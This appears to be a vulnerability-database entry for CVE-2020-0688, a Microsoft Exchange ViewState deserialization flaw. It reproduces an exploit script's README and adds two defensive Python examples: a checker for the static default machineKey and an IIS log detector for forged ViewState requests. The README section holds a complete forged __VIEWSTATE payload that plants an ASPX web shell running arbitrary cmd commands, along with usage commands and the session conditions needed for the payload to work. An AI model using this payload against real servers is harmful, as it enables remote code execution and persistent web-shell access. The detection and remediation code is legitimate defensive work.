Related vulnerability
Title:
Microsoft Exchange Server authorization vulnerability
(CVE-2020-0688)
Description: Microsoft Exchange Server is a mail server product from Microsoft (USA). It provides mail access, storage and forwarding, voicemail, and mail filtering. Microsoft Exchange Server contains an authorization vulnerability. Microsoft's advisory attributes it to the software failing to properly handle objects in memory; the actual root cause is that every Exchange installation shipped with the same static machineKey (validationKey and decryptionKey) in the Exchange Control Panel (ECP) web.config instead of generating unique keys at setup. Anyone who knows those keys can forge a __VIEWSTATE that passes MAC validation and is deserialized by the server, so an attacker holding credentials for any single mailbox can send a crafted request to an ECP page and run arbitrary code in the context of the SYSTEM account. The following products and versions are affected: Microsoft Exchange Server 2010, Microsoft Exchange Server 2013, Micro
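The script's own title below calls this a "default MachineKeySection" deserialization bug: every unpatched Exchange server carried the same validationKey and decryptionKey in the ECP web.config, and that is what makes the forged `__VIEWSTATE` verify. As an added example, not part of the original PoC or of Exchange itself, the following Python reads a web.config document, reports whether it still carries those static defaults, and builds a replacement `<machineKey>` element with per-server random keys. The two key constants are the publicly known Exchange defaults; both web.config documents and the placeholder "fixed" key are constructed samples, not files from a real server. The supported remediation is Microsoft's February 2020 security update, which stops shipping a fixed key; the hand-built element is there only to make the fix concrete.

```python
"""Check an Exchange ECP web.config for the static default <machineKey>
behind CVE-2020-0688 (added example, not code from the original PoC)."""
import secrets
import xml.etree.ElementTree as ET

# Static keys every pre-patch Exchange install shipped in
# %ExchangeInstallPath%\ClientAccess\ecp\web.config (publicly known values).
DEFAULT_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
DEFAULT_DECRYPTION_KEY = "E9D2490BD0075B51D1BA5288514514AF"

# Constructed sample: the shape of the vulnerable ECP web.config.
VULNERABLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="E9D2490BD0075B51D1BA5288514514AF"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>
"""

# Constructed sample with placeholder per-server keys (not real key material).
FIXED_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="{vk}" decryptionKey="{dk}"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
""".format(vk="0123456789ABCDEF" * 8, dk="FEDCBA9876543210" * 4)


def parse_machine_key(web_config_xml):
    """Return the attributes of <configuration>/<system.web>/<machineKey>, or {} if absent."""
    root = ET.fromstring(web_config_xml)
    node = root.find("./system.web/machineKey")
    return dict(node.attrib) if node is not None else {}


def assess_machine_key(web_config_xml):
    """Classify the machineKey: static Exchange default (vulnerable), auto-generated, or custom.

    The forgery only needs the validationKey (it computes the ViewState MAC), so that
    key decides 'vulnerable'; a default decryptionKey is reported as a finding as well.
    """
    mk = parse_machine_key(web_config_xml)
    # ASP.NET's behaviour when the element is missing: per-machine auto-generated keys.
    vk = mk.get("validationKey", "AutoGenerate,IsolateApps")
    dk = mk.get("decryptionKey", "AutoGenerate,IsolateApps")
    findings = []
    if vk.upper() == DEFAULT_VALIDATION_KEY:
        findings.append("validationKey is the static Exchange default: __VIEWSTATE MAC is forgeable")
    if dk.upper() == DEFAULT_DECRYPTION_KEY:
        findings.append("decryptionKey is the static Exchange default")
    return {
        "vulnerable": vk.upper() == DEFAULT_VALIDATION_KEY,
        "auto_generated": vk.startswith("AutoGenerate"),
        "findings": findings,
        "machineKey": mk,
    }


def fresh_machine_key_element():
    """Build a replacement <machineKey> with random per-server keys as XML text.

    Sizes follow ASP.NET guidance: 64 bytes for HMACSHA256 validation, 32 bytes for AES.
    """
    el = ET.Element(
        "machineKey",
        validationKey=secrets.token_hex(64).upper(),
        decryptionKey=secrets.token_hex(32).upper(),
        validation="HMACSHA256",
        decryption="AES",
    )
    return ET.tostring(el, encoding="unicode")


if __name__ == "__main__":
    for name, doc in (("vulnerable sample", VULNERABLE_WEB_CONFIG), ("fixed sample", FIXED_WEB_CONFIG)):
        result = assess_machine_key(doc)
        print(f"{name}: vulnerable={result['vulnerable']} findings={result['findings']}")
    print("replacement element:", fresh_machine_key_element())
```

To run it against a real server, read the ECP web.config into `assess_machine_key`; a `vulnerable=True` result means the server still accepts `__VIEWSTATE` values anyone can forge with the public keys.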
Description
Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"
Introduction
# CVE-2020-0688
## Usage:
```
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml <XAML PATH> -uri <default|liveiderror|...>
```
The script prints the `__VIEWSTATEGENERATOR` value for the chosen ECP page and a forged `__VIEWSTATE` built from the supplied XAML payload, signed with the static default Exchange machineKey. The forged state is only accepted inside an authenticated ECP session: exploitation requires valid credentials for any mailbox, and the ViewState MAC also covers the session's `ASP.NET_SessionId` cookie (ECP's ViewStateUserKey), so the `__VIEWSTATE` must be generated for the same session in which it is submitted and URL-encoded before it is placed in the request query string.
## Example:
This is an example of vulnerability validation by setting a header in the response.
```
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Set-Header.xml -uri default
__VIEWSTATEGENERATOR=
B97B4E27
__VIEWSTATE=
```
This is an example of vulnerability validation by writing a string into the response.
```
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Set-Response.xml -uri default
__VIEWSTATEGENERATOR=
B97B4E27
__VIEWSTATE=
```
This is an example of uploading a web shell via LiveIdError.aspx.
```
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Upload-Shell.xml -uri liveiderror
__VIEWSTATEGENERATOR=
31563A0D
__VIEWSTATE=
/wEy5x4AAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACJHTxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgICB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCIgDQogICAgeG1sbnM6cz0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogICAgeG1sbnM6dz0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uV2ViO2Fzc2VtYmx5PVN5c3RlbS5XZWIiPg0KICA8czpTdHJpbmcgeDpLZXk9ImEiIHg6RmFjdG9yeU1ldGhvZD0iczpFbnZpcm9ubWVudC5HZXRFbnZpcm9ubWVudFZhcmlhYmxlIiB4OkFyZ3VtZW50cz0iRXhjaGFuZ2VJbnN0YWxsUGF0aCIvPg0KICA8czpTdHJpbmcgeDpLZXk9ImIiIHg6RmFjdG9yeU1ldGhvZD0iQ29uY2F0Ij4NCiAgICA8eDpBcmd1bWVudHM+DQogICAgICA8U3RhdGljUmVzb3VyY2UgUmVzb3VyY2VLZXk9ImEiLz4NCiAgICAgIDxzOlN0cmluZz5DbGllbnRBY2Nlc3NcXEF1dG9kaXNjb3ZlclxcUmF2aW4uYXNweDwvczpTdHJpbmc+DQogICAgPC94OkFyZ3VtZW50cz4NCiAgPC9zOlN0cmluZz4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0ieCIgT2JqZWN0VHlwZT0ie3g6VHlwZSBzOklPLkZpbGV9IiBNZXRob2ROYW1lPSJXcml0ZUFsbFRleHQiPg0KICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iYiIvPg0KICAgICAgPHM6U3RyaW5nPiZsdDslQHBhZ2UgbGFuZ3VhZ2U9JnF1b3Q7QyMmcXVvdDslJmd0Ow0KDQombHQ7JUAgaW1wb3J0IE5hbWVzcGFjZT0mcXVvdDtTeXN0ZW0uSU8mcXVvdDslJmd0Ow0KDQombHQ7JUAgaW1wb3J0IE5hbWVzcGFjZT0mcXVvdDtTeXN0ZW0uWG1sJnF1b3Q7JSZndDsNCg0KJmx0OyVAIGltcG9ydCBOYW1lc3BhY2U9JnF1b3Q7U3lzdGVtLlhtbC5Yc2wmcXVvdDslJmd0Ow0KDQombHQ7JQ0Kc3RyaW5nIHhtbD1AJnF1b3Q7Jmx0Oz94bWwgdmVyc2lvbj0mcXVvdDsmcXVvdDsxLjAmcXVvdDsmcXVvdDs/Jmd0OyZsdDtyb290Jmd0O3Rlc3QmbHQ7L3Jvb3QmZ3Q7JnF1b3Q7Ow0Kc3RyaW5nIHhzbHQ9QCZxdW90OyZsdDs/eG1sIHZlcnNpb249JzEuMCc/Jmd0Ow0KJmx0O3hzbDpzdHlsZXNoZWV0IHZlcnNpb249JnF1b3Q7JnF1b3Q7MS4wJnF1b3Q7JnF1b3Q7IHhtbG5zOnhzbD0mcXVvdDsmcXVvdDtodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0mcXVvdDsmcXVv
dDsgeG1sbnM6bXN4c2w9JnF1b3Q7JnF1b3Q7dXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4c2x0JnF1b3Q7JnF1b3Q7IHhtbG5zOnpjZz0mcXVvdDsmcXVvdDt6Y2dvbnZoJnF1b3Q7JnF1b3Q7Jmd0Ow0KICAgICZsdDttc3hzbDpzY3JpcHQgbGFuZ3VhZ2U9JnF1b3Q7JnF1b3Q7SlNjcmlwdCZxdW90OyZxdW90OyBpbXBsZW1lbnRzLXByZWZpeD0mcXVvdDsmcXVvdDt6Y2cmcXVvdDsmcXVvdDsmZ3Q7DQogICAgJmx0O21zeHNsOmFzc2VtYmx5IG5hbWU9JnF1b3Q7JnF1b3Q7bXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JnF1b3Q7JnF1b3Q7LyZndDsNCiAgICAmbHQ7bXN4c2w6YXNzZW1ibHkgbmFtZT0mcXVvdDsmcXVvdDtTeXN0ZW0uRGF0YSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkmcXVvdDsmcXVvdDsvJmd0Ow0KICAgICZsdDttc3hzbDphc3NlbWJseSBuYW1lPSZxdW90OyZxdW90O1N5c3RlbS5Db25maWd1cmF0aW9uLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYSZxdW90OyZxdW90Oy8mZ3Q7DQogICAgJmx0O21zeHNsOmFzc2VtYmx5IG5hbWU9JnF1b3Q7JnF1b3Q7U3lzdGVtLldlYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EmcXVvdDsmcXVvdDsvJmd0Ow0KICAgICAgICAmbHQ7IVtDREFUQVtmdW5jdGlvbiB4bWwoKXsNCiAgICAgICAgdmFyIGM9U3lzdGVtLldlYi5IdHRwQ29udGV4dC5DdXJyZW50O3ZhciBSZXF1ZXN0PWMuUmVxdWVzdDt2YXIgUmVzcG9uc2U9Yy5SZXNwb25zZTsNCiAgICAgICAgdmFyIGNvbW1hbmQgPSBSZXF1ZXN0Lkl0ZW1bJ2NtZCddOw0KICAgICAgICB2YXIgciA9IG5ldyBBY3RpdmVYT2JqZWN0KCZxdW90OyZxdW90O1dTY3JpcHQuU2hlbGwmcXVvdDsmcXVvdDspLkV4ZWMoJnF1b3Q7JnF1b3Q7Y21kIC9jICZxdW90OyZxdW90Oytjb21tYW5kKTsNCiAgICAgICAgdmFyIE91dFN0cmVhbSA9IHIuU3RkT3V0Ow0KICAgICAgICB2YXIgU3RyID0gJnF1b3Q7JnF1b3Q7JnF1b3Q7JnF1b3Q7Ow0KICAgICAgICB3aGlsZSAoIU91dFN0cmVhbS5hdEVuZE9mU3RyZWFtKSB7DQogICAgICAgICAgICBTdHIgPSBTdHIgKyBPdXRTdHJlYW0ucmVhZEFsbCgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICBSZXNwb25zZS5Xcml0ZSgmcXVvdDsmcXVvdDsmbHQ7cHJlJmd0OyZxdW90OyZxdW90OytTdHIrJnF1b3Q7JnF1b3Q7Jmx0Oy9wcmUmZ3Q7JnF1b3Q7JnF1b3Q7KTsNCiAgICAgICAgfV1dJmd0Ow0KICAgICZsdDsvbXN4c2w6c2NyaXB0Jmd0Ow0KJmx0O3hzbDp0ZW1wbGF0ZSBtYXRjaD0mcXVvdDsmcXVvdDsvcm9vdCZxdW90OyZxdW90OyZndDsNCiAgICAmbHQ7eHNsOnZhbHVlLW9mIHNlbGVjdD0mcXVv
dDsmcXVvdDt6Y2c6eG1sKCkmcXVvdDsmcXVvdDsvJmd0Ow0KJmx0Oy94c2w6dGVtcGxhdGUmZ3Q7DQombHQ7L3hzbDpzdHlsZXNoZWV0Jmd0OyZxdW90OzsNClhtbERvY3VtZW50IHhtbGRvYz1uZXcgWG1sRG9jdW1lbnQoKTsNCnhtbGRvYy5Mb2FkWG1sKHhtbCk7DQpYbWxEb2N1bWVudCB4c2xkb2M9bmV3IFhtbERvY3VtZW50KCk7DQp4c2xkb2MuTG9hZFhtbCh4c2x0KTsNClhzbHRTZXR0aW5ncyB4c2x0X3NldHRpbmdzID0gbmV3IFhzbHRTZXR0aW5ncyhmYWxzZSwgdHJ1ZSk7DQp4c2x0X3NldHRpbmdzLkVuYWJsZVNjcmlwdCA9IHRydWU7DQp0cnl7DQogICAgWHNsQ29tcGlsZWRUcmFuc2Zvcm0geGN0PW5ldyBYc2xDb21waWxlZFRyYW5zZm9ybSgpOw0KICAgIHhjdC5Mb2FkKHhzbGRvYyx4c2x0X3NldHRpbmdzLG5ldyBYbWxVcmxSZXNvbHZlcigpKTsNCiAgICB4Y3QuVHJhbnNmb3JtKHhtbGRvYyxudWxsLG5ldyBNZW1vcnlTdHJlYW0oKSk7DQp9DQpjYXRjaCAoRXhjZXB0aW9uIGUpew0KICAgIFJlc3BvbnNlLldyaXRlKCZxdW90O0Vycm9yJnF1b3Q7KTsNCn0NCiUmZ3Q7DQo8L3M6U3RyaW5nPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJjIiBPYmplY3RJbnN0YW5jZT0ie3g6U3RhdGljIHc6SHR0cENvbnRleHQuQ3VycmVudH0iIE1ldGhvZE5hbWU9IiIvPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJkIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGN9IiBNZXRob2ROYW1lPSJnZXRfUmVzcG9uc2UiLz4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBkfSIgTWV0aG9kTmFtZT0iRW5kIi8+DQo8L1Jlc291cmNlRGljdGlvbmFyeT4LfsfNBBf2KLz18AunP/sNrNcKUMM=
```
File snapshot
[4.0K] /data/pocs/9251a069ca408123d7cc51c02aa467b6c5c5c138
├── [3.9K] CVE-2020-0688.ps1
├── [1.3M] Microsoft.PowerShell.Editor.dll
├── [1.1K] NULL-File.xml
├── [9.3K] README.md
├── [1.0K] Set-Header.xml
├── [ 873] Set-Response.xml
└── [3.6K] Upload-Shell.xml
0 directories, 7 files
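The examples above deliver the forged state as `__VIEWSTATEGENERATOR` and `__VIEWSTATE` query parameters on a GET to an ECP page, whereas normal ECP navigation carries `__VIEWSTATE` in a POST body. That difference is visible in the IIS `cs-uri-query` field. As an added example, not part of the original PoC, the following Python parses IIS W3C logs by their `#Fields` header and flags ECP requests with a `__VIEWSTATE` in the query string, pulling out the user, client address and generator for triage. The log text is constructed sample data using RFC 5737 addresses and made-up users; the generator values match the ones the script prints above. A 500 status on such a request is a supporting signal only (a successful payload often ends the response abnormally), so it is recorded but not required.

```python
"""Flag CVE-2020-0688 exploitation attempts in IIS W3C logs
(added example, not code from the original PoC)."""
from urllib.parse import parse_qs

# Constructed sample log: the first and fourth request lines model forged-ViewState
# delivery to ECP pages; the others are ordinary traffic.
SAMPLE_IIS_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-03-01 10:00:01 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEy5x4AAQAAAP%2F%2F%2F%2F8BAAAA 443 CONTOSO\alice 203.0.113.9 Mozilla/5.0 - 500 0 0 153
2020-03-01 10:00:02 10.0.0.5 GET /ecp/default.aspx - 443 CONTOSO\bob 198.51.100.4 Mozilla/5.0 - 200 0 0 40
2020-03-01 10:00:03 10.0.0.5 POST /ecp/default.aspx - 443 CONTOSO\bob 198.51.100.4 Mozilla/5.0 - 200 0 0 80
2020-03-01 10:00:04 10.0.0.5 GET /ecp/LiveIdError.aspx __VIEWSTATEGENERATOR=31563A0D&__VIEWSTATE=%2FwEy5x4AAQAA 443 CONTOSO\alice 203.0.113.9 Mozilla/5.0 - 200 0 0 97
2020-03-01 10:00:05 10.0.0.5 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.example.com%2fowa&reason=0 443 - 198.51.100.4 Mozilla/5.0 - 200 0 0 12
"""


def parse_w3c(log_text):
    """Yield one dict per request line, keyed by the column names in the #Fields header."""
    fields = None
    for line in log_text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        if fields is None:
            raise ValueError("request line before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip instead of mis-aligning columns
        yield dict(zip(fields, values))


def detect_ecp_viewstate_in_query(log_text):
    """Return triage records for ECP requests carrying __VIEWSTATE in the query string."""
    hits = []
    for rec in parse_w3c(log_text):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        if not stem.lower().startswith("/ecp/") or query == "-":
            continue
        # IIS logs the query URL-encoded; parse_qs decodes it. Match keys case-insensitively.
        params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
        if "__viewstate" not in params:
            continue
        hits.append({
            "time": f"{rec['date']} {rec['time']}",
            "user": rec.get("cs-username"),
            "client_ip": rec.get("c-ip"),
            "page": stem,
            "generator": params.get("__viewstategenerator", [None])[0],
            "viewstate_len": len(params["__viewstate"][0]),
            "status": rec.get("sc-status"),
        })
    return hits


if __name__ == "__main__":
    for hit in detect_ecp_viewstate_in_query(SAMPLE_IIS_LOG):
        print(hit)
```

Point `detect_ecp_viewstate_in_query` at the contents of `%SystemDrive%\inetpub\logs\LogFiles\W3SVC1\*.log` on the Exchange server; every hit is an authenticated user whose session was used to submit a ViewState by URL, which legitimate ECP clients do not do.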